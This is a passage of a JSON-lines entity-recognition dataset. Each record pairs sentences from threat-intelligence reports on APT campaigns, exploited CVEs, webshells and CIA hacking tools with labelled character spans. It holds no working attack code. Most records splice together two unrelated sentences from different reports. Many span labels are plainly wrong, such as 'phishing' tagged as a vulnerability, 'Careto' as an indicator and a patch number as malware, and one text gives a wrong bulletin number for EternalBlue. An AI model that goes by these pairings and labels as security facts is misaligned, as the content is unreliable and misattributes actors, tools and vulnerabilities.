SharePoint servers to install the China Chopper webshell . 
We speculate that other attacks delivering Bookworm were also targeting organizations in Thailand based on the contents of the associated decoys documents , as well as several of the dynamic DNS domain names used to host C2 servers that contain the words \" Thai \" or \" Thailand \" .", "spans": [{"start": 50, "end": 56, "label": "Organization"}, {"start": 66, "end": 79, "label": "Vulnerability"}, {"start": 125, "end": 147, "label": "System"}, {"start": 193, "end": 201, "label": "Malware"}, {"start": 288, "end": 304, "label": "Indicator"}, {"start": 333, "end": 351, "label": "Malware"}, {"start": 371, "end": 373, "label": "System"}]} {"text": "The other overlapping files are tools used by the adversary to locate other systems on the network etool.exe , check to see if they are vulnerable to CVE-2017-0144 (EternalBlue) patched in MS07-010 checker1.exe and pivot to them using remote execution functionality offered by a tool similar to PsExec offered by Impacket psexec.exe . Threat actors may use the date string hardcoded into each Bookworm sample as a build identifier .", "spans": [{"start": 99, "end": 108, "label": "Malware"}, {"start": 150, "end": 163, "label": "Vulnerability"}, {"start": 189, "end": 197, "label": "Malware"}, {"start": 198, "end": 210, "label": "Malware"}, {"start": 295, "end": 301, "label": "Malware"}, {"start": 322, "end": 332, "label": "Malware"}, {"start": 361, "end": 382, "label": "Indicator"}, {"start": 393, "end": 408, "label": "Malware"}]} {"text": "The Emissary Panda threat group loaded the China Chopper webshell onto SharePoint servers at two Government organizations in the Middle East , which we believe with high confidence involved exploiting a remote code execution vulnerability in SharePoint tracked in CVE-2019-0604 . 
Due to these changes without a new date string , we believe the date codes are used for campaign tracking rather than a Bookworm build identifier .", "spans": [{"start": 4, "end": 18, "label": "Organization"}, {"start": 43, "end": 56, "label": "System"}, {"start": 264, "end": 277, "label": "Vulnerability"}, {"start": 315, "end": 326, "label": "Indicator"}, {"start": 344, "end": 354, "label": "Indicator"}, {"start": 400, "end": 408, "label": "Malware"}]} {"text": "The files uploaded to this webshell included the same compiled python script that would scan remote systems that were vulnerable to CVE-2017-0144 (EternalBlue) that we saw uploaded to the other errr.aspx webshell . Another decoy slideshow associated with the Bookworm attack campaign contains photos of an event called Bike for Dad 2015 .", "spans": [{"start": 63, "end": 76, "label": "System"}, {"start": 132, "end": 145, "label": "Vulnerability"}, {"start": 194, "end": 203, "label": "Malware"}, {"start": 223, "end": 238, "label": "Indicator"}]} {"text": "We believe the actors pivoted to other systems on the network using stolen credentials and by exploiting the CVE-2017-0144 (EternalBlue) vulnerability patched in MS17-010 . If the document was delivered with macros instead of exploits ( CVE-2012-0158 , CVE-2013-3906 or CVE-2014-1761 ) , then the document contained instructions for enabling macros .", "spans": [{"start": 15, "end": 21, "label": "Organization"}, {"start": 109, "end": 122, "label": "Vulnerability"}, {"start": 162, "end": 170, "label": "Malware"}, {"start": 237, "end": 250, "label": "Vulnerability"}, {"start": 253, "end": 266, "label": "Vulnerability"}, {"start": 270, "end": 283, "label": "Vulnerability"}]} {"text": "To deliver their malware , the cyber criminals use spearphishing emails with various types of attachments: MS Office documents or spreadsheet files exploiting some known vulnerability like CVE-2017-11882 , or documents with Ole2Link and SCT . 
The executable would install the real Ammyy product , but would also launch a file called either AmmyyService.exe or AmmyySvc.exe which contained the malicious payload .", "spans": [{"start": 31, "end": 46, "label": "Organization"}, {"start": 51, "end": 71, "label": "System"}, {"start": 94, "end": 106, "label": "System"}, {"start": 117, "end": 126, "label": "System"}, {"start": 189, "end": 203, "label": "Vulnerability"}, {"start": 209, "end": 218, "label": "System"}, {"start": 340, "end": 356, "label": "Indicator"}, {"start": 360, "end": 372, "label": "Indicator"}]} {"text": "This activity ceased in February 2016 , likely because the men who made up Scattered Canary began to focus on honing their BEC skills . The second , aptly titled \" kontrakt87.doc \" , copies a generic telecommunications service contract from MegaFon , a large Russian mobile phone operator .", "spans": [{"start": 75, "end": 91, "label": "Organization"}, {"start": 164, "end": 178, "label": "Indicator"}, {"start": 200, "end": 226, "label": "Organization"}, {"start": 241, "end": 248, "label": "Organization"}, {"start": 267, "end": 288, "label": "Organization"}]} {"text": "In total , Scattered Canary received more than 3 , 000 account credentials as a result of their phishing attacks . In addition to built-in functionalities , the operators of Careto can upload additional modules which can perform any malicious task .", "spans": [{"start": 11, "end": 27, "label": "Organization"}, {"start": 96, "end": 104, "label": "Vulnerability"}, {"start": 174, "end": 180, "label": "Indicator"}]} {"text": "The past iteration of SLUB spread from a unique watering hole website exploiting CVE-2018-8174 , a VBScript engine vulnerability . 
Careto 's Mask campaign we discovered relies on spear-phishing e-mails with links to a malicious website .", "spans": [{"start": 22, "end": 26, "label": "Organization"}, {"start": 81, "end": 94, "label": "Vulnerability"}, {"start": 131, "end": 137, "label": "Indicator"}]} {"text": "This malicious site used CVE-2019-0752 , an Internet Explorer vulnerability discovered by Trend Micro\u2019s Zero Day Initiative (ZDI) that was just patched this April . Sometimes , the attackers use sub-domains on the exploit websites , to make them seem more legitimate .", "spans": [{"start": 25, "end": 38, "label": "Vulnerability"}, {"start": 90, "end": 103, "label": "Organization"}, {"start": 195, "end": 206, "label": "Malware"}, {"start": 214, "end": 221, "label": "Vulnerability"}]} {"text": "The SLUB malware was delivered through watering hole websites that were injected with exploits for CVE-2018-8174 or CVE-2019-0752 . We initially became aware of Careto when we observed attempts to exploit a vulnerability in our products to make the malware \" invisible \" in the system .", "spans": [{"start": 4, "end": 8, "label": "Organization"}, {"start": 99, "end": 112, "label": "Vulnerability"}, {"start": 116, "end": 129, "label": "Vulnerability"}, {"start": 161, "end": 167, "label": "Indicator"}, {"start": 197, "end": 204, "label": "Vulnerability"}]} {"text": "In May 2018 , campaigns being conducted by SWEED began leveraging another vulnerability in Microsoft Office: CVE-2017-11882 , a remote code execution bug in Microsoft Office that is commonly observed being leveraged in malicious documents used in commodity malware distribution . 
The scanner was identified as the Acunetix Web Vulnerability Scanner which is a commercial penetration testing tool that is readily available as a 14-day trial .", "spans": [{"start": 43, "end": 48, "label": "Organization"}, {"start": 109, "end": 123, "label": "Vulnerability"}, {"start": 314, "end": 348, "label": "Indicator"}]} {"text": "Code contained inside one of the slides triggers an exploit for CVE-2017-8759 , a remote code execution vulnerability in Microsoft .NET framework . The decoy documents dropped suggest that the targets are likely to be politically or militarily motivated , with subjects such as Intelligence reports and political situations being used as lure documents .", "spans": [{"start": 33, "end": 39, "label": "Malware"}, {"start": 64, "end": 77, "label": "Vulnerability"}, {"start": 121, "end": 145, "label": "System"}, {"start": 152, "end": 167, "label": "Indicator"}, {"start": 218, "end": 229, "label": "Organization"}, {"start": 233, "end": 243, "label": "Organization"}, {"start": 303, "end": 312, "label": "Organization"}]} {"text": "Zebrocy activity initiates with spearphishing operations delivering various target profilers and downloaders without the use of any 0day exploits . Lately , Patchwork has been sending multiple RTF files exploiting CVE-2017-8570 .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 132, "end": 145, "label": "Vulnerability"}, {"start": 157, "end": 166, "label": "Organization"}, {"start": 193, "end": 202, "label": "Indicator"}, {"start": 214, "end": 227, "label": "Vulnerability"}]} {"text": "On Nov14 , 2017 , FireEye observed APT34 using an exploit for the Microsoft Office vulnerability to target a government organization in the Middle East . 
The first of which we call ' CONFUCIUS_A ' , a malware family that has links to a series of attacks associated with a backdoor attack method commonly known as SNEEPY ( aka ByeByeShell ) first reported by Rapid7 in 2013 .", "spans": [{"start": 18, "end": 25, "label": "Organization"}, {"start": 35, "end": 40, "label": "Organization"}, {"start": 83, "end": 96, "label": "Vulnerability"}, {"start": 109, "end": 132, "label": "Organization"}, {"start": 183, "end": 194, "label": "Indicator"}, {"start": 313, "end": 319, "label": "Malware"}, {"start": 326, "end": 337, "label": "Malware"}, {"start": 358, "end": 364, "label": "Organization"}]} {"text": "Google and Microsoft have already confirmed the Russian hacker group APT28 used a Flash vulnerability CVE-2016-7855 along with this kernel privilege escalation flaw to perform a targeted attack . At first glance CONFUCIUS_B looks very similar to CONFUCIUS_A , and they are also packaged in plain SFX binary files .", "spans": [{"start": 0, "end": 6, "label": "Organization"}, {"start": 11, "end": 20, "label": "Organization"}, {"start": 69, "end": 74, "label": "Organization"}, {"start": 102, "end": 115, "label": "Vulnerability"}, {"start": 212, "end": 223, "label": "Indicator"}, {"start": 246, "end": 257, "label": "Indicator"}, {"start": 296, "end": 312, "label": "Malware"}]} {"text": "Kaspersky first became aware of BlackOasis\u2019 activities in May 2016 , while investigating another Adobe Flash zero day . 
The CONFUCIUS_B executable is disguised as a PowerPoint presentation , using a Right-To-Left-Override ( RTLO ) trick and a false icon .", "spans": [{"start": 0, "end": 9, "label": "Organization"}, {"start": 32, "end": 43, "label": "Organization"}, {"start": 109, "end": 117, "label": "Vulnerability"}, {"start": 124, "end": 135, "label": "Indicator"}, {"start": 199, "end": 221, "label": "System"}, {"start": 224, "end": 228, "label": "System"}]} {"text": "Through the exploitation of the HTA handler vulnerability described in CVE-2017-1099 , the observed RTF attachments download . We also believe that both clusters of activity have links to attacks with likely Indian origins , the CONFUCIUS_A attacks are linked to the use of SNEEPY/BYEBYESHELL and the CONFUCIUS_B have a loose link to Hangover .", "spans": [{"start": 71, "end": 84, "label": "Vulnerability"}, {"start": 100, "end": 115, "label": "Malware"}, {"start": 274, "end": 292, "label": "Malware"}, {"start": 301, "end": 312, "label": "Indicator"}, {"start": 334, "end": 342, "label": "Malware"}]} {"text": "In early May , the phishing lures leveraged RTF attachments that exploited the Microsoft Windows vulnerability described in CVE-2017-0199 . The two malware families themselves are also very similar , and therefore we think that the shared technique is an indication of a single developer , or development company , behind both CONFUCIUS_A and CONFUCIUS_B .", "spans": [{"start": 44, "end": 59, "label": "Malware"}, {"start": 124, "end": 137, "label": "Vulnerability"}, {"start": 293, "end": 312, "label": "Organization"}, {"start": 327, "end": 338, "label": "Indicator"}, {"start": 343, "end": 354, "label": "Indicator"}]} {"text": "As early as March 4 , 2017 , malicious documents exploiting CVE-2017-0199 were used to deliver the LATENTBOT malware . 
The Android version , for instance , can steal SMS messages , accounts , contacts , and files , as well as record audio .", "spans": [{"start": 29, "end": 48, "label": "Malware"}, {"start": 60, "end": 73, "label": "Vulnerability"}, {"start": 99, "end": 116, "label": "System"}, {"start": 123, "end": 138, "label": "Indicator"}]} {"text": "The first , st07383.en17.docx , continues by utilizing 32 or 64 bit versions of CVE-2017-0001 to escalate privileges before executing a final JavaScript payload containing a malware implant known as SHIRIME . The documents that exploit CVE2017-11882 download another payload \u2014 an HTML Application ( HTA ) file toting a malicious Visual Basic ( VBS ) script \u2014 from the server , which is executed accordingly by the command-line tool mshta.exe .", "spans": [{"start": 12, "end": 29, "label": "Malware"}, {"start": 80, "end": 93, "label": "Vulnerability"}, {"start": 199, "end": 206, "label": "Malware"}, {"start": 228, "end": 235, "label": "Vulnerability"}, {"start": 236, "end": 249, "label": "Vulnerability"}, {"start": 280, "end": 296, "label": "System"}, {"start": 299, "end": 302, "label": "System"}, {"start": 329, "end": 341, "label": "System"}, {"start": 344, "end": 347, "label": "System"}, {"start": 432, "end": 441, "label": "Indicator"}]} {"text": "This vulnerability was found in a document named Trump's_Attack_on_Syria_English.docx\u201d . 
According to our statistics , as of the beginning of 2015 this botnet encompassed over 250 000 infected devices worldwide including infecting more than 100 financial institutions with 80% of them from the top 20 list .", "spans": [{"start": 34, "end": 42, "label": "Malware"}, {"start": 49, "end": 86, "label": "Vulnerability"}, {"start": 152, "end": 170, "label": "Indicator"}, {"start": 245, "end": 267, "label": "Organization"}]} {"text": "The first , st07383.en17.docx , continues by utilizing 32 or 64 bit versions of CVE-2017-0001 to escalate privileges before executing a final JavaScript payload containing a malware implant known as SHIRIME . If a bot was installed on a network that was of interest to the hacking group , this bot was then used to upload one of the remote access programs .", "spans": [{"start": 12, "end": 29, "label": "Malware"}, {"start": 80, "end": 93, "label": "Vulnerability"}, {"start": 199, "end": 206, "label": "Malware"}, {"start": 214, "end": 217, "label": "Indicator"}]} {"text": "This vulnerability was found in a document named Trump's_Attack_on_Syria_English.docx\u201d . At first look , it pretends to be a Java related application but after a quick analysis , it was obvious this was something more than just a simple Java file .", "spans": [{"start": 34, "end": 42, "label": "Malware"}, {"start": 49, "end": 86, "label": "Vulnerability"}, {"start": 125, "end": 149, "label": "Malware"}, {"start": 237, "end": 246, "label": "Indicator"}]} {"text": "In all emails sent to these government officials , the actor used the same attachment : a malicious Microsoft Word document that exploited the CVE-2012-0158 vulnerability to drop a malicious payload . 
Contextually relevant emails are sent to specific targets with attached documents that are packed with exploit code and Trojan horse programmes designed to take advantage of vulnerabilities in software installed on the target 's computer .", "spans": [{"start": 28, "end": 48, "label": "Organization"}, {"start": 90, "end": 123, "label": "Malware"}, {"start": 143, "end": 156, "label": "Vulnerability"}, {"start": 223, "end": 229, "label": "System"}, {"start": 273, "end": 282, "label": "Indicator"}, {"start": 304, "end": 311, "label": "Vulnerability"}, {"start": 321, "end": 327, "label": "Malware"}]} {"text": "Despite being an older vulnerability , many threat actors continue to leverage CVE-2012-0158 to exploit Microsoft Word . The authors of that report identify three primary tools used in the campaigns attributed to Hidden Lynx : Trojan.Naid , Backdoor.Moudoor , and Backdoor.Hikit .", "spans": [{"start": 79, "end": 92, "label": "Vulnerability"}, {"start": 104, "end": 118, "label": "Malware"}, {"start": 227, "end": 238, "label": "Malware"}, {"start": 241, "end": 257, "label": "Indicator"}, {"start": 264, "end": 278, "label": "Malware"}]} {"text": "This Gorgon Group campaign leveraged spear phishing emails with Microsoft Word documents exploiting CVE-2017-0199 . The above network shows relationships between three tools used by Hidden Lynx during its VOHO campaign : Trojan.Naid , Backdoor.Moudoor , and Backdoor.Hikit .", "spans": [{"start": 64, "end": 88, "label": "Malware"}, {"start": 100, "end": 113, "label": "Vulnerability"}, {"start": 221, "end": 232, "label": "Malware"}, {"start": 235, "end": 251, "label": "Indicator"}, {"start": 258, "end": 272, "label": "Malware"}]} {"text": "Ke3chang has also leveraged a Java zero-day vulnerability ( CVE-2012-4681 ) , as well as older , reliable exploits for Microsoft Word ( CVE-2010-3333 ) and Adobe PDF Reader ( CVE-2010-2883 ) . 
Symantec during 2012 linked the Elderwood Project to Operation Aurora ; Trojan.Naid and Backdoor.Moudoor were also used in Aurora , by the Elderwood Gang , and by Hidden Lynx .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 30, "end": 57, "label": "Vulnerability"}, {"start": 60, "end": 73, "label": "Vulnerability"}, {"start": 119, "end": 133, "label": "Malware"}, {"start": 136, "end": 149, "label": "Vulnerability"}, {"start": 156, "end": 172, "label": "System"}, {"start": 175, "end": 188, "label": "Vulnerability"}, {"start": 193, "end": 201, "label": "Organization"}, {"start": 265, "end": 276, "label": "Malware"}, {"start": 281, "end": 297, "label": "Indicator"}, {"start": 316, "end": 322, "label": "Malware"}, {"start": 332, "end": 346, "label": "Organization"}, {"start": 356, "end": 367, "label": "Organization"}]} {"text": "Documents with the Flash exploit managed to evade static defenses and remain undetected as an exploit on VirusTotal . One e-mail carried a Microsoft PowerPoint file named \" thanks.pps \" ( VirusTotal ) , the other a Microsoft Word document named \" request.docx \" .", "spans": [{"start": 0, "end": 9, "label": "Malware"}, {"start": 19, "end": 32, "label": "Vulnerability"}, {"start": 122, "end": 128, "label": "System"}, {"start": 139, "end": 159, "label": "System"}, {"start": 173, "end": 183, "label": "Indicator"}, {"start": 188, "end": 198, "label": "System"}, {"start": 215, "end": 229, "label": "System"}, {"start": 247, "end": 259, "label": "Indicator"}]} {"text": "Some of the documents exploited CVE-2017-0199 to deliver the payload . Around the same time , WildFire also captured an e-mail containing a Word document ( \" hello.docx \" ) with an identical hash as the earlier Word document , this time sent to a U.S. 
Government recipient .", "spans": [{"start": 12, "end": 21, "label": "Malware"}, {"start": 32, "end": 45, "label": "Vulnerability"}, {"start": 49, "end": 68, "label": "Malware"}, {"start": 94, "end": 102, "label": "Organization"}, {"start": 120, "end": 126, "label": "System"}, {"start": 140, "end": 144, "label": "System"}, {"start": 158, "end": 168, "label": "Indicator"}, {"start": 211, "end": 215, "label": "System"}, {"start": 252, "end": 262, "label": "Organization"}]} {"text": "Both attachments are malicious Word documents that attempt to exploit the Windows OLE Automation Array Remote Code Execution Vulnerability tracked by CVE-2014-6332 . The initially-observed \" thanks.pps \" example tricks the user into running the embedded file named ins8376.exe which loads a payload DLL named mpro324.dll .", "spans": [{"start": 21, "end": 45, "label": "Malware"}, {"start": 74, "end": 138, "label": "Vulnerability"}, {"start": 150, "end": 163, "label": "Vulnerability"}, {"start": 191, "end": 201, "label": "Indicator"}, {"start": 265, "end": 276, "label": "Indicator"}, {"start": 299, "end": 302, "label": "System"}, {"start": 309, "end": 320, "label": "Indicator"}]} {"text": "POWRUNER was delivered using a malicious RTF file that exploited CVE-2017-0199 . In this case , the file used the software name \" Cyberlink \" , and a description of \" CLMediaLibrary Dynamic Link Library \" and listing version 4.19.9.98 .", "spans": [{"start": 0, "end": 8, "label": "System"}, {"start": 41, "end": 49, "label": "Malware"}, {"start": 65, "end": 78, "label": "Vulnerability"}, {"start": 130, "end": 139, "label": "Indicator"}, {"start": 182, "end": 202, "label": "System"}]} {"text": "This bait document , or email attachment , appears to be a standard Word document , but is in fact an CVE-2012-0158 exploit , an executable with a double extension , or an executable with an RTLO filename , so it can execute code without the user 's knowledge or consent . 
This next stage library copies itself into the System32 directory of the Windows folder after the hardcoded file name \u2014 either KBDLV2.DLL or AUTO.DLL , depending on the malware sample .", "spans": [{"start": 5, "end": 18, "label": "Malware"}, {"start": 68, "end": 81, "label": "Malware"}, {"start": 102, "end": 115, "label": "Vulnerability"}, {"start": 346, "end": 353, "label": "System"}, {"start": 400, "end": 410, "label": "Indicator"}, {"start": 414, "end": 422, "label": "Indicator"}]} {"text": "The backdoor was delivered via a malicious .rtf file that exploited CVE-2017-0199 . Once BARIUM has established rapport , they spear-phish the victim using a variety of unsophisticated malware installation vectors , including malicious shortcut ( .lnk ) files with hidden payloads , compiled HTML help ( .chm ) files , or Microsoft Office documents containing macros or exploits .", "spans": [{"start": 43, "end": 52, "label": "Malware"}, {"start": 68, "end": 81, "label": "Vulnerability"}, {"start": 169, "end": 184, "label": "Malware"}, {"start": 185, "end": 192, "label": "Malware"}, {"start": 226, "end": 244, "label": "Malware"}, {"start": 247, "end": 251, "label": "Indicator"}, {"start": 292, "end": 316, "label": "Malware"}, {"start": 322, "end": 348, "label": "Malware"}]} {"text": "The attackers stole organizations' SSL certificates associated with security appliances such as ASA to obtain VPN credentials , allowing the actors to gain access to the targeted network . 
This was the case in two known intrusions in 2015 , where attackers named the implant DLL \" ASPNET_FILTER.DLL \" to disguise it as the DLL for the ASP.NET ISAPI Filter .", "spans": [{"start": 4, "end": 13, "label": "Organization"}, {"start": 96, "end": 99, "label": "System"}, {"start": 275, "end": 278, "label": "System"}, {"start": 281, "end": 298, "label": "Indicator"}, {"start": 323, "end": 326, "label": "System"}, {"start": 335, "end": 355, "label": "Indicator"}]} {"text": "More importantly , one of these files also enables the download of TeamViewer , a remote access tool that gives threat actors remote control over the system . In early 2016 the Callisto Group began sending highly targeted spear phishing emails with malicious attachments that contained , as their final payload , the \" Scout \" malware tool from the HackingTeam RCS Galileo platform .", "spans": [{"start": 67, "end": 77, "label": "System"}, {"start": 112, "end": 125, "label": "Organization"}, {"start": 237, "end": 243, "label": "System"}, {"start": 249, "end": 270, "label": "Indicator"}, {"start": 319, "end": 324, "label": "Malware"}]} {"text": "The agency's hacking division freed it from having to disclose its often controversial operations to the NSA (its primary bureaucratic rival) in order to draw on the NSA's hacking capacities . The malicious attachments purported to be invitations or drafts of the agenda for the conference .", "spans": [{"start": 13, "end": 29, "label": "Organization"}, {"start": 105, "end": 108, "label": "Organization"}, {"start": 197, "end": 218, "label": "Indicator"}, {"start": 235, "end": 246, "label": "Malware"}, {"start": 250, "end": 270, "label": "Malware"}]} {"text": "After infestation , Weeping Angel places the target TV in a 'Fake-Off' mode , so that the owner falsely believes the TV is off when it is on . 
We encountered the first document exploit called \" THAM luan - GD - NCKH2.doc \" a few days ago , which appears to be leveraging some vulnerabilities patched with MS12-060 .", "spans": [{"start": 20, "end": 33, "label": "Organization"}, {"start": 177, "end": 184, "label": "Vulnerability"}, {"start": 194, "end": 210, "label": "Indicator"}, {"start": 211, "end": 220, "label": "Indicator"}, {"start": 305, "end": 313, "label": "Malware"}]} {"text": "The CIA's Mobile Devices Branch (MDB) developed numerous attacks to remotely hack and control popular smart phones . This document , written in Vietnamese , appears to be reviewing and discussing best practices for teaching and researching scientific topics .", "spans": [{"start": 4, "end": 9, "label": "Organization"}]} {"text": "These techniques permit the CIA to bypass the encryption of WhatsApp , Signal , Telegram , Wiebo , Confide and Cloackman by hacking the smart phones that they run on and collecting audio and message traffic before encryption is applied . Examples as early as 2008 document malware operations against Tibetan non-governmental organizations ( NGOs ) that also targeted Falun Gong and Uyghur groups .", "spans": [{"start": 28, "end": 31, "label": "Organization"}, {"start": 264, "end": 280, "label": "Indicator"}, {"start": 300, "end": 338, "label": "Organization"}, {"start": 341, "end": 345, "label": "Organization"}, {"start": 367, "end": 377, "label": "Organization"}, {"start": 382, "end": 395, "label": "Organization"}]} {"text": "The CIA also runs a very substantial effort to infect and control Microsoft Windows users with its malware . 
There is the exploit code and malware used to gain access to systems , the infrastructure that provides command and control to the malware operator , and the human elements \u2013 developers who create the malware , operators who deploy it , and analysts who extract value from the stolen information .", "spans": [{"start": 4, "end": 7, "label": "Organization"}, {"start": 122, "end": 134, "label": "Indicator"}]} {"text": "As an example , specific CIA malware revealed in Year Zero is able to penetrate , infest and control both the Android phone and iPhone software that runs or has run presidential Twitter accounts . The operation against the Tibetan Parliamentarians illustrates the continued use of malicious attachments in the form of documents bearing exploits .", "spans": [{"start": 25, "end": 28, "label": "Organization"}, {"start": 29, "end": 36, "label": "System"}, {"start": 223, "end": 247, "label": "Organization"}, {"start": 281, "end": 302, "label": "Indicator"}, {"start": 318, "end": 344, "label": "Malware"}]} {"text": "we assess with high confidence that these incidents were conducted by APT10 also known as Stone Panda , menuPass , CVNX in an effort to gain access to networks and steal valuable intellectual property or gain commercial advantage . The first attack started in early July with a ShimRatReporter payload .", "spans": [{"start": 70, "end": 75, "label": "Organization"}, {"start": 90, "end": 101, "label": "Organization"}, {"start": 104, "end": 112, "label": "Organization"}, {"start": 115, "end": 119, "label": "Organization"}, {"start": 278, "end": 293, "label": "Indicator"}]} {"text": "Utilizing actors working for shell companies such as Huaying Haitai Science and Technology Development Co Ltd , the MSS has conducted an unprecedented campaign , dubbed Operation Cloud Hopper , \u201d against managed IT service providers (MSPs) designed to steal intellectual property and enable secondary attacks against their clients . 
In their Operation Tropic Trooper report , Trend Micro documented the behaviour and functionality of an espionage toolkit with several design similarities to those observed in the various components of KeyBoy .", "spans": [{"start": 116, "end": 119, "label": "Organization"}, {"start": 376, "end": 387, "label": "Organization"}, {"start": 437, "end": 454, "label": "Indicator"}, {"start": 535, "end": 541, "label": "Malware"}]} {"text": "We assess that APT10 likely compromised Visma with the primary goal of enabling secondary intrusions onto their client networks , and not of stealing Visma intellectual property . The exploit document carrying this alternate KeyBoy configuration also used a decoy document which was displayed to the user after the exploit launched .", "spans": [{"start": 15, "end": 20, "label": "Organization"}, {"start": 184, "end": 200, "label": "Indicator"}, {"start": 225, "end": 231, "label": "Malware"}, {"start": 258, "end": 272, "label": "Indicator"}, {"start": 315, "end": 322, "label": "Vulnerability"}]} {"text": "In this same time frame , APT10 also targeted a U.S. law firm and an international apparel company , likely to gather information for commercial advantage . This technique hides the true C2 server from researchers that do not have access to both the rastls.dll and Sycmentec.config files .", "spans": [{"start": 26, "end": 31, "label": "Organization"}, {"start": 48, "end": 61, "label": "Organization"}, {"start": 83, "end": 98, "label": "Organization"}, {"start": 187, "end": 189, "label": "System"}, {"start": 250, "end": 260, "label": "Indicator"}, {"start": 265, "end": 287, "label": "Indicator"}]} {"text": "Access to the networks of these third-party service providers grants the MSS the ability to potentially access the networks of hundreds , if not thousands , of corporations around the world . 
This file requires the target to attempt to open the .lnk file , which redirects the user to a Windows Scripting Component ( .wsc ) file , hosted on an adversary-controlled microblogging page .", "spans": [{"start": 73, "end": 76, "label": "Organization"}, {"start": 245, "end": 254, "label": "Indicator"}, {"start": 287, "end": 294, "label": "System"}, {"start": 317, "end": 321, "label": "Indicator"}]} {"text": "In all three incidents , the attackers gained access to networks through deployments of Citrix and LogMeIn remote-access software using stolen valid user credentials . Upon successful exploitation , the attachment will install the Trojan known as NetTraveler using a DLL side-loading attack technique .", "spans": [{"start": 29, "end": 38, "label": "Organization"}, {"start": 203, "end": 213, "label": "Indicator"}, {"start": 231, "end": 237, "label": "Malware"}, {"start": 247, "end": 258, "label": "Malware"}, {"start": 267, "end": 283, "label": "Indicator"}]} {"text": "In early 2017 , APT10 began conducting attacks against global managed IT service providers (MSPs) that granted them unprecedented access to MSPs and their customers\u2019 networks . Kaspersky Lab 's products detect the Microsoft Office exploits used in the spear-phishing attacks , including Exploit.MSWord.CVE-2010-333 , Exploit.Win32.CVE-2012-0158 .", "spans": [{"start": 16, "end": 21, "label": "Organization"}, {"start": 70, "end": 80, "label": "Organization"}, {"start": 91, "end": 97, "label": "Organization"}, {"start": 177, "end": 190, "label": "Organization"}, {"start": 214, "end": 230, "label": "Organization"}, {"start": 231, "end": 239, "label": "Vulnerability"}, {"start": 287, "end": 314, "label": "Indicator"}, {"start": 317, "end": 344, "label": "Indicator"}]} {"text": "This was followed by an initial exploitation , network enumeration , and malicious tool deployment on various Visma endpoints within two weeks of initial access . 
The files exploit the well-known Microsoft Office vulnerability , CVE-2012-0158 , to execute malicious code in order to take control of the targeted systems .", "spans": [{"start": 110, "end": 125, "label": "System"}, {"start": 167, "end": 172, "label": "Indicator"}, {"start": 173, "end": 180, "label": "Vulnerability"}, {"start": 196, "end": 212, "label": "System"}, {"start": 229, "end": 242, "label": "Vulnerability"}]} {"text": "They also used WinRAR and cURL for Windows , both often renamed , to compress and upload the exfiltrated files from the Visma network to the Dropbox API . We also discovered an interesting piece of rare malware created by this threat actor \u2013 a Bluetooth device harvester .", "spans": [{"start": 120, "end": 125, "label": "System"}, {"start": 141, "end": 152, "label": "System"}, {"start": 203, "end": 210, "label": "Malware"}, {"start": 244, "end": 270, "label": "Indicator"}]} {"text": "The attacker gained access to the victim\u2019s internet-accessible Citrix systems and authenticated to them from networks associated with low-cost VPN providers owned by VPN Consumer Network . For example , Bisonal malware in 2012 used send() and recv() APIs to communicate with its C2. This Bisonal variant used in the latest attack communicates with one of the following hard-coded C2 addresses by using the HTTP POST method on TCP PROT 443 .", "spans": [{"start": 4, "end": 12, "label": "Organization"}, {"start": 63, "end": 69, "label": "System"}, {"start": 203, "end": 218, "label": "Organization"}, {"start": 288, "end": 295, "label": "Indicator"}, {"start": 380, "end": 382, "label": "System"}, {"start": 426, "end": 429, "label": "Indicator"}]} {"text": "The attackers used the same method of lateral movement by mounting the remote drive on a system , copying 1.bat to it , using task scheduler to execute the batch script , and finally , deleting the batch script . 
Previous reports have discussed Bisonal malware used in attacks against Japan , South Korea and Russia .", "spans": [{"start": 4, "end": 13, "label": "Organization"}, {"start": 106, "end": 111, "label": "System"}, {"start": 245, "end": 260, "label": "Indicator"}]} {"text": "APT10's unprecedented campaign against MSPs , alleged to have included some of the largest MSPs in the world , in order to conduct secondary attacks against their clients , grants the Chinese state the ability to potentially access the networks of hundreds (if not thousands) of corporations around the world . This particular sample we found targeted an organization in Russia and there is a specific system language check for Cyrillic and no others .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 39, "end": 43, "label": "Organization"}, {"start": 327, "end": 333, "label": "Indicator"}]} {"text": "The malware basically provides a remote CMD/PowerShell terminal for the attackers , enabling them to execute scripts/commands and receive the results via HTTP requests . If it's Cyrillic and the command to the shell is not \u2018ipconfig\u2019 , the threat converts the command result text encoding from Cyrillic to UTF-16 .", "spans": [{"start": 4, "end": 11, "label": "Malware"}, {"start": 22, "end": 30, "label": "Malware"}, {"start": 40, "end": 54, "label": "System"}, {"start": 72, "end": 81, "label": "Organization"}, {"start": 173, "end": 177, "label": "Indicator"}, {"start": 178, "end": 186, "label": "Malware"}, {"start": 306, "end": 312, "label": "Malware"}]} {"text": "What lied beneath this facade was a well-engineered campaign of phishing attacks designed to steal credentials and spy on the activity of dozens of journalists , human rights defenders , trade unions and labour rights activists , many of whom are seemingly involved in the issue of migrants\u2019 rights in Qatar and Nepal . 
Similar to the Bisonal variant targeting the Russian organization , this sample was also disguised as PDF document .", "spans": [{"start": 335, "end": 342, "label": "Indicator"}, {"start": 422, "end": 425, "label": "System"}]} {"text": "It appears that the attackers may have impersonated the identity of a real young woman and stole her pictures to construct the fake profile , along with a professional biography also stolen from yet another person . The contents of the decoy PDF is a job descriptions with the South Korean Coast Guard .", "spans": [{"start": 20, "end": 29, "label": "Organization"}, {"start": 232, "end": 245, "label": "Indicator"}, {"start": 290, "end": 301, "label": "Organization"}]} {"text": "Dubbed \u2018Operation Sheep\u2019 , this massive data stealing campaign is the first known campaign seen in the wild to exploit the Man-in-the-Disk vulnerability revealed by Check Point Research earlier last year . The installed EXE file is almost exactly the same as the DLL version of Bisonal variant used against the Russian organization .", "spans": [{"start": 7, "end": 24, "label": "Organization"}, {"start": 123, "end": 138, "label": "Vulnerability"}, {"start": 210, "end": 228, "label": "Indicator"}, {"start": 263, "end": 266, "label": "System"}, {"start": 278, "end": 293, "label": "Indicator"}]} {"text": "In theory , Shun Wang Technologies could have collected a third of China\u2019s population names and contact numbers if not more . 
